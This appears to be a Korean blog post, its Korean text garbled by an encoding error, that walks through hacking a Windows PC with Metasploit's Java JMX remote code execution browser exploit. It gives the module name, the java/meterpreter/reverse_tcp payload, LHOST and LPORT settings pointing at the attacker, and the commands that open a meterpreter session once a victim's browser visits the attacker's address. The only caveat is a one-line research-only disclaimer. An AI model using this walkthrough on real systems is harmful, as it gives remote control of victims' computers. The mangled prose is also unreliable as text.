Metasploit

Hack windows with metasploit Java Applet JMX Remote Code Execution

๐“›๐“พ๐“ฌ๐“ฎ๐“ฝ๐“ฎ_๐“ข๐“ฝ๐“ฎ๐“ต๐“ต๐“ช 2016. 12. 22.
728x90
๋ฐ˜์‘ํ˜•

๋ชจ๋“  ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค. ์—ฐ๊ตฌ ๋ชฉ์ ์œผ๋กœ๋งŒ ์‚ฌ์šฉํ•˜์‹œ๊ธฐ ๋ฐ”๋ž๋‹ˆ๋‹ค.

๋จผ์ € ํ•˜๊ธฐ์ „์— ๋ฆฌ๋ˆ…์Šค์—์„œ 

service apache2 start

service postgresql start

service metastploit start ๋ช…๋ น์–ด๋“ค์„ ์‹คํ–‰ ์‹œ์ผœ์ค€๋‹ค.


๊ทธ ํ›„ msfconsole์„ ํ•ด์ค€๋‹ค. 



๊ทธ๋Ÿผ ์œ„์™€๊ฐ™์€ ์ฐฝ์ด ๋œฐ๊ฒƒ์ด๋‹ค. (๊ทธ๋ฆผ์€ ๋‹ค๋ฅผ ์ˆ˜ ์žˆ๋‹ค.)



๊ทธ ํ›„ ์šฐ๋ฆฌ๊ฐ€ ํ•ด์•ผํ•  ์ผ์€ ํ•ธ๋“ค๋Ÿฌ๋ฅผ ๋งŒ๋“œ๋Š” ์ผ์ด๋‹ค.

use exploit/multi/browser/java_jre17_jmxbean_2 ๋ช…๋ น์–ด๋ฅผ ์ด์šฉํ•˜์—ฌ ํ•ธ๋“ค๋Ÿฌ๋ฅผ ๋งŒ๋“ ๋‹ค.


์šฐ๋ฆฌ๊ฐ€ ๋‹ค์Œ ํ•ด์•ผ ํ•  ํ–‰๋™์œผ๋กœ show options ์„ ์ด์šฉํ•˜์—ฌ ์šฐ๋ฆฌ๊ฐ€ ์ •ํ•ด์ค˜์•ผํ•˜๋Š” ๊ฒƒ์„ ๋ณธ๋‹ค.



๋จผ์ € URIPATH ๋ช…๋ น์–ด๋ฅผ ์ด์šฉํ•˜์—ฌ ๊ฒฝ๋กœ๋ฅผ ์ง€์ •ํ•ด์ค€๋‹ค. / ํ•ด๋„๋˜๊ณ  test๋ฅผ ํ•ด๋„๋œ๋‹ค. ์ง€์ •ํ•˜์ง€ ์•Š์œผ๋ฉด ๋žœ๋ค๊ฐ’์œผ๋กœ ๋งŒ๋“ค์–ด ์ค€๋‹ค.



๋‹ค์Œ์œผ๋กœ๋Š” payload๋ฅผ ์„ค์ •ํ•˜๊ธฐ์œ„ํ•ด show payloads ๋ช…๋ น์–ด๋ฅผ ์ด์šฉํ•˜์—ฌ payload ๊ฐ€ ๋ฌด์—‡์ด์žˆ๋Š”์ง€ ํ™•์ธ์„ ํ•œ๋‹ค.



์šฐ๋ฆฌ๊ฐ€ ์‚ฌ์šฉํ•  payload๋Š” java/meterpreter/reverse_tcp ๋ผ๋Š” payload ๋ฅผ ์ด์šฉํ•  ๊ฒƒ์ด๋‹ค. 



payload ๋˜ํ•œ ์„ค์ • ํ–ˆ์œผ๋‹ˆ ๋‹ค์‹œ show options์„ ์ด์šฉํ•˜์—ฌ ๋‹ค์Œ ์„ค์ •ํ•  ๊ฒƒ์„ ๋ณด์ž 



set LHOST attacker IP ์™€ set LPORT ๋ช…๋ น์–ด๋ฅผ ์ด์šฉํ•˜์—ฌ ํ†ต์‹ ํ•  ํฌํŠธ๋ฅผ ์ง€์ •ํ•ด์ค€๋‹ค.


๋‹ค์Œ์€ exploit -j  ๋ช…๋ น์–ด๋ฅผ ์ด์šฉํ•œ๋‹ค. 


๊ทธ ํ›„ victim PC์—์„œ ์ธํ„ฐ๋„ท๋ธŒ๋ผ์šฐ์ €์—์„œ ๊ณต๊ฒฉ์ž๊ฐ€ ์ง€์ •ํ•œ IP๋กœ ์ ‘์†์„ ํ•˜๊ฒŒ ๋œ๋‹ค๋ฉด 

attacker PC์—์„œ๋Š” victim ์ปดํ“จํ„ฐ์˜ session ์„ ํ™•์ธ ํ• ์ˆ˜์žˆ๋‹ค.



๊ทธ๋Ÿผ session -i ID[session ID]๋ฅผ ์ž…๋ ฅํ•˜๋ฉด meterpreter๊ฐ€ ๊ฐ€๋Šฅํ•˜๋‹ค.



728x90
๋ฐ˜์‘ํ˜•

๋Œ“๊ธ€